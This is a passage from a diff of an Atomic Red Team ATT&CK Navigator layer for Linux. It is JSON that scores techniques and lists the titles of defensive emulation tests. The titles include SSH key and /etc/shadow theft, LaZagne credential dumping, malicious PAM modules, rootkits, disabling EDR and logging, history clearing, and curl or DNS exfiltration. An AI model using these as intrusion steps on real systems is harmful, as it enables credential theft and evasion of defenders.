Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with CP\n- Copy Private SSH Keys with CP (freebsd)\n- Copy Private SSH Keys with rsync\n- Copy Private SSH Keys with rsync (freebsd)\n- Copy the users GnuPG directory with rsync\n- Copy the users GnuPG directory with rsync (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- Cat the contents of a Kubernetes service account token file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on CentOS/RHEL\n- Install root CA on FreeBSD\n- Install root CA on Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.003","score":1,"enabled":true,"comment":"\n- LaZagne.py - Dump Credentials from Firefox Browser\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1556","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"comment":"\n- Malicious PAM rule\n- Malicious PAM rule (freebsd)\n- Malicious PAM module\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n- Encrypts collected data with AES-256 and Base64\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"comment":"\n- Compressing data using GZip in Python (FreeBSD/Linux)\n- Compressing data using bz2 in Python (FreeBSD/Linux)\n- Compressing data using zipfile in Python (FreeBSD/Linux)\n- Compressing data using tarfile in Python (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":43,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Disable journal logging via systemctl utility\n- Disable journal logging via sed utility\n"},{"techniqueID":"T1562.001","score":11,"enabled":true,"comment":"\n- Disable syslog\n- Disable syslog (freebsd)\n- Disable Cb Response\n- Disable SELinux\n- Stop Crowdstrike Falcon on Linux\n- Clear History\n- Suspend History\n- Reboot Linux Host via Kernel System Request\n- Clear Pagging Cache\n- Disable Memory Swap\n- Tamper with Defender ATP on Linux/MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"comment":"\n- Disable history collection\n- Disable history collection (freebsd)\n- Mac HISTCONTROL\n- Clear bash history\n- Setting the HISTCONTROL environment variable\n- Setting the HISTFILESIZE environment variable\n- Setting the HISTSIZE environment variable\n- Setting the HISTFILE environment variable\n- Setting the HISTFILE environment variable (freebsd)\n- Setting the HISTIGNORE environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":13,"enabled":true,"comment":"\n- Stop/Start UFW firewall\n- Stop/Start Packet Filter\n- Stop/Start UFW firewall systemctl\n- Turn off UFW logging\n- Add and delete UFW firewall rules\n- Add and delete Packet Filter rules\n- Edit UFW firewall user.rules file\n- Edit UFW firewall ufw.conf file\n- Edit UFW firewall sysctl.conf file\n- Edit UFW firewall main configuration file\n- Tail the UFW firewall log file\n- Disable iptables\n- Modify/delete iptables firewall rules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":4,"enabled":true,"comment":"\n- Auditing Configuration Changes on Linux Host\n- Auditing Configuration Changes on FreeBSD Host\n- Logging Configuration Changes on Linux Host\n- Logging Configuration Changes on FreeBSD Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":1,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":1,"enabled":true,"comment":"\n- psexec.py (Impacket)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":2,"enabled":true,"comment":"\n- Shared Library Injection via /etc/ld.so.preload\n- Shared Library Injection via LD_PRELOAD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1614","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":4,"enabled":true,"comment":"\n- Discover System Language with locale\n- Discover System Language with localectl\n- Discover System Language by locale file\n- Discover System Language by Environment Variable Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team (Linux)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Linux"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"comment":"\n- Dump individual process memory with sh (Local)\n- Dump individual process memory with sh on FreeBSD (Local)\n- Dump individual process memory with Python (Local)\n- Capture Passwords with MimiPenguin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"comment":"\n- Access /etc/shadow (Local)\n- Access /etc/master.passwd (Local)\n- Access /etc/passwd (Local)\n- Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat\n- Access /etc/{shadow,passwd,master.passwd} with shell builtins\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Find and dump sqlite databases (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1007","score":1,"enabled":true,"comment":"\n- System Service Discovery - systemctl/service\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"comment":"\n- Loadable Kernel Module based Rootkit\n- Loadable Kernel Module based Rootkit\n- dynamic-linker based rootkit (libprocesshider)\n- Loadable Kernel Module based Rootkit (Diamorphine)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":1,"enabled":true,"comment":"\n- System Network Configuration Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":6,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n- Remote System Discovery - ip neighbour\n- Remote System Discovery - ip route\n- Remote System Discovery - netstat\n- Remote System Discovery - ip tcp_metrics\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":2,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n- Pad Binary to Change Hash using truncate command - Linux/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX (linux)\n- Binary packed by UPX, with modified headers (linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":1,"enabled":true,"comment":"\n- Masquerading as FreeBSD or Linux crond process.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":1,"enabled":true,"comment":"\n- linux rename /proc/pid/comm using prctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":1,"enabled":true,"comment":"\n- Space After Filename\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.004","score":2,"enabled":true,"comment":"\n- rc.common\n- rc.local\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":8,"enabled":true,"comment":"\n- Packet Capture Linux using tshark or tcpdump\n- Packet Capture FreeBSD using tshark or tcpdump\n- Packet Capture FreeBSD using /dev/bpfN with sudo\n- Filtered Packet Capture FreeBSD using /dev/bpfN with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo\n- Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo\n- Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":2,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl freebsd,linux or macos\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":3,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - DNS\n- Python3 http.server\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery FreeBSD, Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n- Cron - Add script to /etc/cron.d folder\n- Cron - Add script to /var/spool/cron/crontabs/ folder\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"comment":"\n- Create Systemd Service and Timer\n- Create a user level transient systemd service and timer\n- Create a system level transient systemd service and timer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1056","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":6,"enabled":true,"comment":"\n- Living off the land Terminal Input Capture on Linux with pam.d\n- Logging bash history to syslog\n- Logging sh history to syslog/messages\n- Bash session based keylogger\n- SSHD PAM keylogger\n- Auditd keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n- Harvest SUID executable files\n- LinEnum tool execution\n- New script file in the tmp directory\n- What shell is running\n- What shells are available\n- Command line scripts\n- Obfuscated command line scripts\n- Change login shell\n- Environment variable scripts\n- Detecting pipe-to-shell\n- Current kernel information enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"comment":"\n- Execute shell script via python's command mode arguement\n- Execute Python via scripts\n- Execute Python via Python executables\n- Python pty module and spawn function used to spawn sh or bash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":9,"enabled":true,"comment":"\n- rm -rf\n- rm -rf\n- Truncate system log files via truncate utility (freebsd)\n- Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)\n- Overwrite FreeBSD system log via echo utility\n- Delete system log files via unlink utility (freebsd)\n- Delete system journal logs via rm and journalctl utilities\n- Overwrite Linux Mail Spool\n- Overwrite Linux Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":9,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear Bash history (echo)\n- Clear Bash history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear Bash history (truncate)\n- Clear history of a bunch of shells\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n- Disable Bash History Logging with SSH -T\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":4,"enabled":true,"comment":"\n- Delete a single file - FreeBSD/Linux/macOS\n- Delete an entire folder - FreeBSD/Linux/macOS\n- Overwrite and delete a file with shred\n- Delete Filesystem - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Linux\n- Copy and Modify Mailbox Data on Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":1,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.003","score":5,"enabled":true,"comment":"\n- Create local account (Linux)\n- Reactivate a locked/expired account (Linux)\n- Reactivate a locked/expired account (FreeBSD)\n- Login as nobody (Linux)\n- Login as nobody (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":8,"enabled":true,"comment":"\n- List OS Information\n- Linux VM Check via Hardware\n- Linux VM Check via Kernel Modules\n- FreeBSD VM Check via Kernel Modules\n- Hostname Discovery\n- Environment variables discovery on freebsd, macos and linux\n- Linux List Kernel Modules\n- FreeBSD List Kernel Modules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":6,"enabled":true,"comment":"\n- Enumerate all accounts (Local)\n- View sudoers access\n- View accounts with UID 0\n- List opened files by user\n- Show if a user account has ever logged in remotely\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- Connection Proxy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":1,"enabled":true,"comment":"\n- Tor Proxy Usage - Debian/Ubuntu/FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":8,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n- Linux Download File and Run\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- SUDO Brute Force - Debian\n- SUDO Brute Force - Redhat\n- SUDO Brute Force - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.004","score":2,"enabled":true,"comment":"\n- SSH Credential Stuffing From Linux\n- SSH Credential Stuffing From FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":4,"enabled":true,"comment":"\n- X Windows Capture\n- X Windows Capture (freebsd)\n- Capture Linux Desktop using Import Tool\n- Capture Linux Desktop using Import Tool (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Add or copy content to clipboard with xClip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":1,"enabled":true,"comment":"\n- System Time Discovery in FreeBSD/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":2,"enabled":true,"comment":"\n- Base64 Encoded data.\n- Base64 Encoded data (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":2,"enabled":true,"comment":"\n- Network Share Discovery - linux\n- Network Share Discovery - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a user account on a Linux system\n- Create a user account on a FreeBSD system\n- Create a new user in Linux with `root` UID and GID.\n- Create a new user in FreeBSD with `root` GID.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":2,"enabled":true,"comment":"\n- Active Directory Create Admin Account\n- Active Directory Create User Account (Non-elevated)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1140","score":8,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Base64 decoding with shell utilities (freebsd)\n- FreeBSD b64encode Shebang in CLI\n- Hex decoding with shell utilities\n- Linux Base64 Encoded Shebang in CLI\n- XOR decoding and command execution using Python\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":3,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine password complexity policy - Ubuntu\n- Examine password complexity policy - FreeBSD\n- Examine password complexity policy - CentOS/RHEL 7.x\n- Examine password complexity policy - CentOS/RHEL 6.x\n- Examine password expiration policy - All Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":2,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux\n- List Google Chromium Bookmark JSON Files on FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":14,"enabled":true,"links":[{"label":"View 